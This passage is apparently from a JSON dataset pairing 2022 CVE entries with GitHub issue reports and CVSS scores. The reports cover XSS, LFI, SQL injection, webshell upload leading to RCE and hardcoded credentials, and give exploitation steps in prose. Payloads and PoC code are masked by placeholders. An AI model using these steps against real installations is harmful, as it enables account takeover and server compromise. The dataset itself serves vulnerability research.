  80001. "impactScore": 2.7,
  80002. "exploitabilityScore": 2.8
  80003. },
  80004. {
  80005. "CVE_ID": "CVE-2022-25015",
  80006. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/285",
  80007. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/285",
  80008. "Repo_new": "gamonoid/icehrm",
  80009. "Issue_Created_At": "2021-12-23T08:15:18Z",
  80010. "description": "Stored XSS vulnerability in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description APITAG website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require. As an example, here we will demonstrate Proof of Concept NUMBERTAG Login as any user into the dashboard NUMBERTAG Send the following payload, meant for updating the 'first name' of the logged in user. You'll have to replace the PHPSESSID , with the session ID of any valid logged in (less privileged) user . ERRORTAG NUMBERTAG Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed APITAG > Users' . You'll be able to see the alert box with session cookie of 'admin' user. The extra added APITAG request parameter causes the backend to ignore sanitization of user input. Impact A less privileged user can take over 'admin' account by stealing the session cookie. Occurrences URLTAG URLTAG User input sanitization is not done if the 'content' parameter is set to 'HTML'",
  80011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80012. "severity": "MEDIUM",
  80013. "baseScore": 5.4,
  80014. "impactScore": 2.7,
  80015. "exploitabilityScore": 2.3
  80016. },
  80017. {
  80018. "CVE_ID": "CVE-2022-25023",
  80019. "Issue_Url_old": "https://github.com/adamstark/AudioFile/issues/58",
  80020. "Issue_Url_new": "https://github.com/adamstark/audiofile/issues/58",
  80021. "Repo_new": "adamstark/audiofile",
  80022. "Issue_Created_At": "2022-02-08T12:21:52Z",
  80023. "description": "Bug]heap buffer overflow in function APITAG Description A heap buffer overflow was discovered in function APITAG The issue is being triggered in function APITAG Version Version NUMBERTAG d URLTAG APITAG commit) Environment Ubuntu NUMBERTAG bit Reproduce Command APITAG program ERRORTAG POC file at the bottom of this report. ASAN Report FILETAG FILETAG POC POC URLTAG Any issue plz contact with me: EMAILTAG OR: twitter: APITAG",
  80024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80025. "severity": "HIGH",
  80026. "baseScore": 8.8,
  80027. "impactScore": 5.9,
  80028. "exploitabilityScore": 2.8
  80029. },
  80030. {
  80031. "CVE_ID": "CVE-2022-25044",
  80032. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2142",
  80033. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2142",
  80034. "Repo_new": "espruino/espruino",
  80035. "Issue_Created_At": "2022-02-08T12:58:50Z",
  80036. "description": "stack buffer overflow APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  80037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80038. "severity": "HIGH",
  80039. "baseScore": 7.8,
  80040. "impactScore": 5.9,
  80041. "exploitabilityScore": 1.8
  80042. },
  80043. {
  80044. "CVE_ID": "CVE-2022-25045",
  80045. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/6",
  80046. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/6",
  80047. "Repo_new": "vivekpanday12/cve-",
  80048. "Issue_Created_At": "2022-02-09T09:00:10Z",
  80049. "description": "Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Home Owners Collection Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: VIVEK PANDAY Vendor Homepage: FILETAG Software Link: FILETAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
  80050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80051. "severity": "CRITICAL",
  80052. "baseScore": 9.8,
  80053. "impactScore": 5.9,
  80054. "exploitabilityScore": 3.9
  80055. },
  80056. {
  80057. "CVE_ID": "CVE-2022-25050",
  80058. "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/1960",
  80059. "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/1960",
  80060. "Repo_new": "merbanan/rtl_433",
  80061. "Issue_Created_At": "2022-01-24T12:23:29Z",
  80062. "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  80063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80064. "severity": "MEDIUM",
  80065. "baseScore": 5.5,
  80066. "impactScore": 3.6,
  80067. "exploitabilityScore": 1.8
  80068. },
  80069. {
  80070. "CVE_ID": "CVE-2022-25069",
  80071. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2990",
  80072. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2990",
  80073. "Repo_new": "marktext/marktext",
  80074. "Issue_Created_At": "2022-02-07T17:22:39Z",
  80075. "description": "Security issue: DOM based XSS & RCE from pasting vulnerable HTML. APITAG Description An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS. ERRORTAG The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script. URLTAG APITAG [x] Can you reproduce the issue? APITAG Steps to reproduce APITAG NUMBERTAG Copy the vulnerable HTML code ERRORTAG NUMBERTAG Paste it into Mark Text app Expected behavior: APITAG HTML should be sanitized before pasted into DOM. Actual behavior: APITAG No HTML sanitize procedure. Only checks if it's wrapped with APITAG or not. Link to an example: [optional] FILETAG FILETAG APITAG Versions APITAG version: APITAG Operating system: Windows NUMBERTAG APITAG Kali Linux APITAG",
  80076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  80077. "severity": "CRITICAL",
  80078. "baseScore": 9.6,
  80079. "impactScore": 6.0,
  80080. "exploitabilityScore": 2.8
  80081. },
  80082. {
  80083. "CVE_ID": "CVE-2022-25104",
  80084. "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/43",
  80085. "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/43",
  80086. "Repo_new": "ttimot24/horizontcms",
  80087. "Issue_Created_At": "2022-02-13T12:28:51Z",
  80088. "description": "Arbitrary file download vulnerability. APITAG NUMBERTAG beta APITAG updated on NUMBERTAG Submit date NUMBERTAG APITAG file download vulnerability FILETAG POC\uff1a APITAG FILETAG",
  80089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80090. "severity": "HIGH",
  80091. "baseScore": 7.5,
  80092. "impactScore": 3.6,
  80093. "exploitabilityScore": 3.9
  80094. },
  80095. {
  80096. "CVE_ID": "CVE-2022-25139",
  80097. "Issue_Url_old": "https://github.com/nginx/njs/issues/451",
  80098. "Issue_Url_new": "https://github.com/nginx/njs/issues/451",
  80099. "Repo_new": "nginx/njs",
  80100. "Issue_Created_At": "2021-12-24T06:48:19Z",
  80101. "description": "Heap UAF in njs_await_fulfilled. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  80102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80103. "severity": "CRITICAL",
  80104. "baseScore": 9.8,
  80105. "impactScore": 5.9,
  80106. "exploitabilityScore": 3.9
  80107. },
  80108. {
  80109. "CVE_ID": "CVE-2022-25220",
  80110. "Issue_Url_old": "https://github.com/1modm/petereport/issues/35",
  80111. "Issue_Url_new": "https://github.com/1modm/petereport/issues/35",
  80112. "Repo_new": "1modm/petereport",
  80113. "Issue_Created_At": "2022-02-07T20:21:47Z",
  80114. "description": "Security Issue Stored XSS (markdown). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code inside the markdown descriptions while creating a product, report or finding. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Click on APITAG Product NUMBERTAG Insert the following APITAG inside the product description. APITAG NUMBERTAG Click on APITAG Product NUMBERTAG If a user visits the product and click on the link in the description the Javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  80115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80116. "severity": "MEDIUM",
  80117. "baseScore": 4.8,
  80118. "impactScore": 2.7,
  80119. "exploitabilityScore": 1.7
  80120. },
  80121. {
  80122. "CVE_ID": "CVE-2022-25229",
  80123. "Issue_Url_old": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
  80124. "Issue_Url_new": "https://github.com/popcorn-official/popcorn-desktop/issues/2491",
  80125. "Repo_new": "popcorn-official/popcorn-desktop",
  80126. "Issue_Created_At": "2022-04-26T20:46:04Z",
  80127. "description": "Popcorn Time NUMBERTAG SS to RCE. Our security team found a security issue inside Popcorn Time NUMBERTAG We have reserved the CVETAG to refer to this issue. Attached below is the link to our responsible disclosure policy. URLTAG Bug description Popcorn Time NUMBERTAG has a Stored XSS in the APITAG field via the settings page. The APITAG configuration is set to on which allows the webpage to use APITAG features, an attacker can leverage this to run OS commands. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Open the Popcorn time application NUMBERTAG Go to settings NUMBERTAG Enable Show advanced settings NUMBERTAG Scroll down to the APITAG section NUMBERTAG Insert the following APITAG inside the APITAG field and click on Check for updates . APITAG NUMBERTAG Scroll down to the Database section and click on Export database NUMBERTAG The application will create a APITAG file with the current configuration NUMBERTAG Send the configuration to the victim NUMBERTAG The victim must go to APITAG and click on Import Database NUMBERTAG When the victim restarts the application the XSS will be triggered and will run the calc command. Screenshots and files FILETAG System Information Version: Popcorn Time NUMBERTAG Operating System: Windows NUMBERTAG N/A Build NUMBERTAG Installer: Popcorn Time NUMBERTAG win NUMBERTAG Setup.exe",
  80128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80129. "severity": "MEDIUM",
  80130. "baseScore": 5.4,
  80131. "impactScore": 2.7,
  80132. "exploitabilityScore": 2.3
  80133. },
  80134. {
  80135. "CVE_ID": "CVE-2022-25301",
  80136. "Issue_Url_old": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
  80137. "Issue_Url_new": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
  80138. "Repo_new": "metabench/jsgui-lang-essentials",
  80139. "Issue_Created_At": "2021-12-13T10:20:18Z",
  80140. "description": "Prototype pollution in function jsgui lang APITAG jsgui lang essentials runs the risk of prototype contamination when using inherited attributes in the function APITAG the risk locate is in here URLTAG",
  80141. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80142. "severity": "CRITICAL",
  80143. "baseScore": 9.8,
  80144. "impactScore": 5.9,
  80145. "exploitabilityScore": 3.9
  80146. },
  80147. {
  80148. "CVE_ID": "CVE-2022-25407",
  80149. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/21",
  80150. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/21",
  80151. "Repo_new": "kishan0725/hospital-management-system",
  80152. "Issue_Created_At": "2022-02-13T15:55:55Z",
  80153. "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter doctor.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
  80154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80155. "severity": "MEDIUM",
  80156. "baseScore": 5.4,
  80157. "impactScore": 2.7,
  80158. "exploitabilityScore": 2.3
  80159. },
  80160. {
  80161. "CVE_ID": "CVE-2022-25408",
  80162. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/22",
  80163. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/22",
  80164. "Repo_new": "kishan0725/hospital-management-system",
  80165. "Issue_Created_At": "2022-02-13T15:57:12Z",
  80166. "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter dpassword.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: APITAG Steps to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG click APITAG Doctors ', use burpsuite to insert xss payload in the \"dpassword\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG",
  80167. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80168. "severity": "MEDIUM",
  80169. "baseScore": 5.4,
  80170. "impactScore": 2.7,
  80171. "exploitabilityScore": 2.3
  80172. },
  80173. {
  80174. "CVE_ID": "CVE-2022-25409",
  80175. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/20",
  80176. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/20",
  80177. "Repo_new": "kishan0725/hospital-management-system",
  80178. "Issue_Created_At": "2022-02-13T15:53:58Z",
  80179. "description": "Persistent cross site scripting (XSS) targeted towards web admin through FILETAG at via the parameter demail.. Persistent cross site scripting (XSS) in Hospital Management System NUMBERTAG targeted towards web admin through FILETAG at via the parameter demail. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
  80180. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80181. "severity": "MEDIUM",
  80182. "baseScore": 5.4,
  80183. "impactScore": 2.7,
  80184. "exploitabilityScore": 2.3
  80185. },
  80186. {
  80187. "CVE_ID": "CVE-2022-25410",
  80188. "Issue_Url_old": "https://github.com/maxsite/cms/issues/485",
  80189. "Issue_Url_new": "https://github.com/maxsite/cms/issues/485",
  80190. "Repo_new": "maxsite/cms",
  80191. "Issue_Created_At": "2022-02-17T16:01:55Z",
  80192. "description": "Stored Cross Site Scripting (XSS)(authenticated NUMBERTAG Stored Cross Site Scripting (XSS NUMBERTAG a stored cross site scripting (XSS) in maxsite cms targeted towards web admin through PATHTAG at via the parameter f_file_description NUMBERTAG Navigate to admin page, go to URLTAG update a FILETAG file FILETAG NUMBERTAG insert xss payload APITAG in the parameter f_file_description FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG",
  80193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80194. "severity": "MEDIUM",
  80195. "baseScore": 5.4,
  80196. "impactScore": 2.7,
  80197. "exploitabilityScore": 2.3
  80198. },
  80199. {
  80200. "CVE_ID": "CVE-2022-25411",
  80201. "Issue_Url_old": "https://github.com/maxsite/cms/issues/487",
  80202. "Issue_Url_new": "https://github.com/maxsite/cms/issues/487",
  80203. "Repo_new": "maxsite/cms",
  80204. "Issue_Created_At": "2022-02-17T17:15:18Z",
  80205. "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG Description of Vulnerability The arbitrary file deletion vulnerability URLTAG can delete PATHTAG and then in /admin/options add the types of files allowed to be uploaded, it will allows hacker to bypass the protection system protection upload malicious php files and execute malicious php code,eventually leading to a command execution vulnerability Proof of concept APITAG NUMBERTAG in PATHTAG a zagruzki add 'php' in \" \u0420\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0435 \u0442\u0438\u043f\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\" FILETAG NUMBERTAG Use the method of URLTAG to delete PATHTAG FILETAG NUMBERTAG upload php files whice containing malicious code: APITAG FILETAG NUMBERTAG open the php file PATHTAG then rce FILETAG",
  80206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80207. "severity": "CRITICAL",
  80208. "baseScore": 9.8,
  80209. "impactScore": 5.9,
  80210. "exploitabilityScore": 3.9
  80211. },
  80212. {
  80213. "CVE_ID": "CVE-2022-25412",
  80214. "Issue_Url_old": "https://github.com/maxsite/cms/issues/486",
  80215. "Issue_Url_new": "https://github.com/maxsite/cms/issues/486",
  80216. "Repo_new": "maxsite/cms",
  80217. "Issue_Created_At": "2022-02-17T16:55:54Z",
  80218. "description": "Multiple Arbitrary File Deletion vulnerabilities. Description of Vulnerability Multiple Arbitrary File Deletion vulnerabilities in maxsite cms NUMBERTAG targeted towards web admin through PATHTAG at the parameter dir and deletefile affected source code: at NUMBERTAG in PATHTAG FILETAG when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Proof of concept APITAG NUMBERTAG in URLTAG select file to delete and Send the request directly through burp FILETAG FILETAG NUMBERTAG APITAG can traverse the directory to delete any file FILETAG NUMBERTAG APITAG APITAG Additional The same problem occurs in PATHTAG at the parameter f_check_files",
  80219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  80220. "severity": "HIGH",
  80221. "baseScore": 8.1,
  80222. "impactScore": 5.2,
  80223. "exploitabilityScore": 2.8
  80224. },
  80225. {
  80226. "CVE_ID": "CVE-2022-25462",
  80227. "Issue_Url_old": "https://github.com/bbuhrow/avx-ecm/issues/1",
  80228. "Issue_Url_new": "https://github.com/bbuhrow/avx-ecm/issues/1",
  80229. "Repo_new": "bbuhrow/avx-ecm",
  80230. "Issue_Created_At": "2022-01-18T02:39:11Z",
  80231. "description": "There are some bugs in this avx ecm.. FILETAG I merge all dependences of yafu. When I want to factor this number. I will receive segment falut. >> APITAG Following text is the message from gdb. CODETAG",
  80232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80233. "severity": "HIGH",
  80234. "baseScore": 7.5,
  80235. "impactScore": 3.6,
  80236. "exploitabilityScore": 3.9
  80237. },
  80238. {
  80239. "CVE_ID": "CVE-2022-25464",
  80240. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/255",
  80241. "Issue_Url_new": "https://github.com/doramart/doracms/issues/255",
  80242. "Repo_new": "doramart/doracms",
  80243. "Issue_Created_At": "2022-02-19T12:51:51Z",
  80244. "description": "There is a stored xss vulnerability exists in APITAG FILETAG Step NUMBERTAG enter the JS code < script > alert NUMBERTAG APITAG in the template, as shown in the following figure. FILETAG FILETAG Step NUMBERTAG after saving the changes, visit ERRORTAG HTML and index HTML, trigger JS code execution pop up window. FILETAG FILETAG",
  80245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80246. "severity": "MEDIUM",
  80247. "baseScore": 4.8,
  80248. "impactScore": 2.7,
  80249. "exploitabilityScore": 1.7
  80250. },
  80251. {
  80252. "CVE_ID": "CVE-2022-25465",
  80253. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2136",
  80254. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2136",
  80255. "Repo_new": "espruino/espruino",
  80256. "Issue_Created_At": "2022-01-29T16:21:46Z",
  80257. "description": "stack overflow APITAG in APITAG Environment APITAG Build APITAG Proof of concept ERRORTAG Stack Dump ERRORTAG Credit Q1IQ( APITAG",
  80258. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80259. "severity": "HIGH",
  80260. "baseScore": 7.8,
  80261. "impactScore": 5.9,
  80262. "exploitabilityScore": 1.8
  80263. },
  80264. {
  80265. "CVE_ID": "CVE-2022-25484",
  80266. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/715",
  80267. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/715",
  80268. "Repo_new": "appneta/tcpreplay",
  80269. "Issue_Created_At": "2022-02-15T07:37:33Z",
  80270. "description": "Bug] Reachable assertion in APITAG Describe the bug The assertion APITAG in APITAG at tree.c is reachable when the user uses tcpprep to open a crafted pcap file. The variable APITAG is assigned in APITAG at get.c. URLTAG However, when the datalink is APITAG or ERRORTAG , APITAG is not assigned, and the assertion is triggered. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Get the Tcpreplay source code (master NUMBERTAG f NUMBERTAG and compile it NUMBERTAG Run command: APITAG The POC file could be downloaded here: [POC_file URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG The GDB report: CODETAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG bit Tcpreplay Version NUMBERTAG master NUMBERTAG f NUMBERTAG",
  80271. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80272. "severity": "MEDIUM",
  80273. "baseScore": 5.5,
  80274. "impactScore": 3.6,
  80275. "exploitabilityScore": 1.8
  80276. },
  80277. {
  80278. "CVE_ID": "CVE-2022-25485",
  80279. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/24",
  80280. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/24",
  80281. "Repo_new": "cuppacms/cuppacms",
  80282. "Issue_Created_At": "2022-02-16T08:43:24Z",
  80283. "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in FILETAG . poc APITAG APITAG analysis FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post url without and lfi protected filter Repair suggestions you can check url ,for example check if it has .. then refuse this request",
  80284. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80285. "severity": "HIGH",
  80286. "baseScore": 7.8,
  80287. "impactScore": 5.9,
  80288. "exploitabilityScore": 1.8
  80289. },
  80290. {
  80291. "CVE_ID": "CVE-2022-25486",
  80292. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/25",
  80293. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/25",
  80294. "Repo_new": "cuppacms/cuppacms",
  80295. "Issue_Created_At": "2022-02-16T08:54:20Z",
  80296. "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the APITAG parameter in FILETAG . poc APITAG FILETAG analysis location: FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post APITAG without any lfi protected filter Repair suggestions you can check APITAG ,for example check if it has .. then refuse this request",
  80297. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80298. "severity": "HIGH",
  80299. "baseScore": 7.8,
  80300. "impactScore": 5.9,
  80301. "exploitabilityScore": 1.8
  80302. },
  80303. {
  80304. "CVE_ID": "CVE-2022-25486",
  80305. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/15",
  80306. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/15",
  80307. "Repo_new": "cuppacms/cuppacms",
  80308. "Issue_Created_At": "2022-01-04T14:09:43Z",
  80309. "description": "Non authenticated local file inclusion. Greetings, I found a LFI vulnerability in APITAG How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.",
  80310. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80311. "severity": "HIGH",
  80312. "baseScore": 7.8,
  80313. "impactScore": 5.9,
  80314. "exploitabilityScore": 1.8
  80315. },
  80316. {
  80317. "CVE_ID": "CVE-2022-25487",
  80318. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/256",
  80319. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/256",
  80320. "Repo_new": "thedigicraft/atom.cms",
  80321. "Issue_Created_At": "2022-02-16T13:50:57Z",
  80322. "description": "An Unauthorized Remote Code Execution vulnerability exists in APITAG NUMBERTAG An Unauthorized attacker can upload arbitrary file in the FILETAG and executing it on the server reaching the RCE. poc ERRORTAG APITAG you can find the filename in respose. APITAG then you get a shell in APITAG APITAG analysis file FILETAG line NUMBERTAG without any protect for upload files extension APITAG Repair suggestions set some filter about files extension",
  80323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80324. "severity": "CRITICAL",
  80325. "baseScore": 9.8,
  80326. "impactScore": 5.9,
  80327. "exploitabilityScore": 3.9
  80328. },
  80329. {
  80330. "CVE_ID": "CVE-2022-25494",
  80331. "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/16",
  80332. "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/16",
  80333. "Repo_new": "g33kyrash/online-banking-system",
  80334. "Issue_Created_At": "2022-02-17T07:58:38Z",
  80335. "description": "There is a SQL injection vulnerability in FILETAG . poc First visit FILETAG APITAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG APITAG analysis file FILETAG line NUMBERTAG ERRORTAG without any filter for username and password",
  80336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80337. "severity": "CRITICAL",
  80338. "baseScore": 9.8,
  80339. "impactScore": 5.9,
  80340. "exploitabilityScore": 3.9
  80341. },
  80342. {
  80343. "CVE_ID": "CVE-2022-25495",
  80344. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/26",
  80345. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/26",
  80346. "Repo_new": "cuppacms/cuppacms",
  80347. "Issue_Created_At": "2022-02-19T14:51:30Z",
  80348. "description": "An Remote Code Execution vulnerability exists in Cuppa cms via file upload function. An attacker can upload arbitrary file via the PATHTAG and executing it on the server reaching the RCE. poc after login in setting module,add 'php' as Allowed extensions APITAG APITAG then upload a php file and use burp or other soft intercept request and send to repeater change the path as \"../\" APITAG uploadfile name can be seen in response APITAG as we can know, APITAG is as same as APITAG so visit APITAG you can getshell APITAG",
  80349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80350. "severity": "CRITICAL",
  80351. "baseScore": 9.8,
  80352. "impactScore": 5.9,
  80353. "exploitabilityScore": 3.9
  80354. },
  80355. {
  80356. "CVE_ID": "CVE-2022-25497",
  80357. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/28",
  80358. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/28",
  80359. "Repo_new": "cuppacms/cuppacms",
  80360. "Issue_Created_At": "2022-02-19T16:22:14Z",
  80361. "description": "Unauthorized Arbitrary File Read vulnerability exists in APITAG An Unauthorized attacker can read arbitrary file via copy function poc CODETAG then visit APITAG APITAG",
  80362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80363. "severity": "MEDIUM",
  80364. "baseScore": 5.3,
  80365. "impactScore": 1.4,
  80366. "exploitabilityScore": 3.9
  80367. },
  80368. {
  80369. "CVE_ID": "CVE-2022-25498",
  80370. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/29",
  80371. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/29",
  80372. "Repo_new": "cuppacms/cuppacms",
  80373. "Issue_Created_At": "2022-02-19T17:39:40Z",
  80374. "description": "Unauthorized Remote Code Execution vulnerability exists in APITAG via APITAG function. An Unauthorized attacker can execute arbitrary php code via ERRORTAG , APITAG function poc ERRORTAG then APITAG is your webshell password is cmd APITAG analysis when parameter file is APITAG after base NUMBERTAG decode is ERRORTAG we can code inject into the last line, and the final result is our shellcode injected to the APITAG APITAG",
  80375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80376. "severity": "CRITICAL",
  80377. "baseScore": 9.8,
  80378. "impactScore": 5.9,
